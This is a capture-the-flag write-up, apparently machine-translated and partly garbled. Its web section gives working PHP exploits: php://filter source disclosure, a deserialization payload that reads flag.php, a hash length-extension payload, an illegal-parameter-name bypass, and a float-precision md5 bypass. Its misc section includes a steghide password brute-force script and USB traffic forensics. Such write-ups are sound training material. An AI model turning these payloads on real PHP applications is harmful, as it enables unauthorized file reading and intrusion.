Web
EasyPhp
<?php
$sz_txt = $_GET["sz_txt"];
$sz_file = $_GET["sz_file"];
$password = $_GET["password"];
if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
echo "<br><h1>".file_get_contents($sz_txt,'r')."</h1></br>";
if(preg_match("/flag/",$sz_file)){
echo "Not now!";
exit();
}else{
include($sz_file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
$sz_txtUse data://or php://inputpseudo protocol, then $sz_fileuse php://filterpseudo protocol to read the source code
?sz_txt=data:text/plain,welcome to jxsz&sz_file=php://filter/read=convert.base64-encode/resource=useless.php
base64 decode to get the useless.phpsource code
<?php
class Flag{
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("So cool,continue plz");
}
}
}
?>
Construct the deserialized poc, directly modify the attribute $fileto read the file name of the source code
<?php
class Flag{
public $file = "flag.php";
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("So cool,continue plz");
}
}
}
$res = new Flag();
echo serialize($res);
?>
PS C:\Users\Administrator\Desktop> php .\test.php
O:4:"Flag":1:{
s:4:"file";s:8:"flag.php";}
Capture POST packet and modify GET parameters:?sz_txt=php://input&sz_file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
The POST content is:welcome to jxsz
flag{
4a5a802f-6a37-44d4-8a49-e9066dfd6474}
parseHash
<?php
include("key.php");
class person{
public $aa;
public $bb;
public $username;
public $password;
public function __construct($key=''){
$this->username="jxsz";
$this->password="jxsz";
if(strlen($key)==16&&md5($key . urldecode( $this->username . $this->password)=="a1133ca71ed6320a0255b0d53188be57")){
echo "Welcome";
}
}
public function __destruct(){
$this->aa = (string)$this->aa;
if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){
die("no no no");
}
if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){
echo file_get_contents("/flag");
}
}
}
highlight_file(__FILE__);
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
echo "66666666666";
unserialize($_GET['sz_sz.sz']);
}
The original question of the national competition was easytrickchanged, and the test here ishash拓展攻击 + php非法表单名传参 + php浮点数高精度绕过
Hash expansion attack
$this->username = "jxsz"
$this->password = "jxsz"
strlen($key)==16
md5($key.urldecode($this->username.$this->password)) = "a1133ca71ed6320a0255b0d53188be57"
strlen($key) + strlen("jxsz") = 20
最后一个条件: 传入字符串中需要有“szxy666”字符,并且不能放在开头
hashpumpGenerate directly using hash expansion attack tools
Hashpump tool address: https://github.com/bwall/HashPump
ec789edf786174babd157da5492e1850
jxsz\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00szxy666
Will be \x00replaced by the %00incoming can successfully carry out an output bypass66666666666
pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=ec789edf786174babd157da5492e1850
GETIllegal characters in the deserialized parameter name.
unserialize($_GET['sz_sz.sz']);
Here is based on PHP's handling mechanism for illegal transfer of names: https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified
Can be found in illegal processing hexadecimal characters appear in mass participation were .only replaced once
it here for the title variable name sz_sz.szin order to prevent .being replaced _by replacing only one binary processing incoming parameter name was changed sz[sz.szto
?sz[sz.sz=
The next step is easytrickthe practice of the national competition , but here is the bypass method of filtering NANand INF, but it can still be bypassed with high precision using floating point numbers. The serialized poc is as follows:
<?php
class person{
public $aa;
public $bb;
}
$res = new person();
$res->aa = 0.8 * 7;
$res->bb = 7 * 0.8;
echo serialize($res);
?>
PS C:\Users\Administrator\Desktop> php .\test.php
O:6:"person":2:{
s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
payload
?sz[sz.sz=O:6:"person":2:{
s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
flag{
4a1a802f-6b37-44c4-8b49-e9066ddd6474}
Misc
Checkin
flag{
welc0me_to_ganwangbei}
face
Lennyfuck interpreter
https://github.com/Knorax/Lennyfuck_interpreter
Just follow the comparison table to replace
++++++++++[->++++++++++<]>++.++++++.<+++[->---<]>--.++++++.<++++[->++++<]>++++.<+++++[->-----<]>---------.<++++[->++++<]>++++++.++++++.<++++[->----<]>------.<+++[->+++<]>+++.<+++++[->-----<]>----.<+++++[->+++++<]>++++++++.++++++++.<++++[->----<]>--------.+++.<++++[->++++<]>.<++++[->----<]>-.++++++++.+++++.<+++[->---<]>------.+++++++.-----.++.++.------.<+++++[->-----<]>-----.<++++++[->++++++<]>+++++++++.<+++[->---<]>-.-----.<++++[->----<]>---.<+++++[->+++++<]>.+++++++++..<+++[->+++<]>++.<++++[->----<]>---.<+++[->+++<]>++++++.<++++[->----<]>--.++++++++.<++++[->++++<]>++.<
Online explanation website: https://sange.fi/esoteric/brainfuck/impl/interp/i.html
flag{
You_kNow_brain_face_And_Lennyfuck}
DestroyJava
The download attachment is a mp4file, the video content is about destroying JAVA, and there is no clue. After binwalkanalysis, it is found that there are pictures steganographic in the mp4file, using foremostseparation
Get a jpgpicture, steghide infodetect the jpgsteganographic file
Use a script to blast the password,
# -*- coding: utf8 -*-
#python2
from subprocess import *
def foo():
stegoFile='flag.jpg'#这里填图片名称
extractFile='output.txt'#输出从图片中得到的隐藏内容
passFile='password.txt'#密码字典
errors=['could not extract','steghide --help','Syntax error']
cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"'
f=open(passFile,'r')
for line in f.readlines():
cmd=cmdFormat %(stegoFile,extractFile,line.strip())
p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
content=unicode(p.stdout.read(),'gbk')
for err in errors:
if err in content:
break
else:
print content,
print 'the passphrase is %s' %(line.strip())
f.close()
return
if __name__ == '__main__':
foo()
print 'ok'
pass
Get the password as:, passwordand get the steganographic file hide.txt, check the content and find that the characteristics are similarbase85
W^7?+drDz;VP7$GUvy|?Ut&dbbYE;iZfA92XJub$ZeLVrWnXu1a%^OM
The bse85 online decryption station on the Internet seems to be unable to solve it. Use the python base64 template to solve the base85 decryption to get the flag
flag{
Java_1s_the_bEst_lAnguage_in_The_world}
Hidepig
pig.pdfIt is the postpartum care information of the sow. The guess should be pdf隐写, use it wbStego4open, but you need to enter the password. Guess the password is there pig2.pcapng, use wireshark to open, USB traffic analysis
USB keyboard data package forensic script: https://github.com/WangYihang/UsbKeyboardDataHacker
Just run it as you do
tshark -r ./example.pcap -T fields -e usb.capdata
python UsbKeyboardDataHacker.py ./pig2.pcapng
Then use wbStego4open, extract the hidden pdf files`
wbStego4open download address: http://www.bailer.at/wbstego/fs_download.html
Fill in the password and
select the output file
flag{
pDF_1s_r2a1ly_intEresT1ng}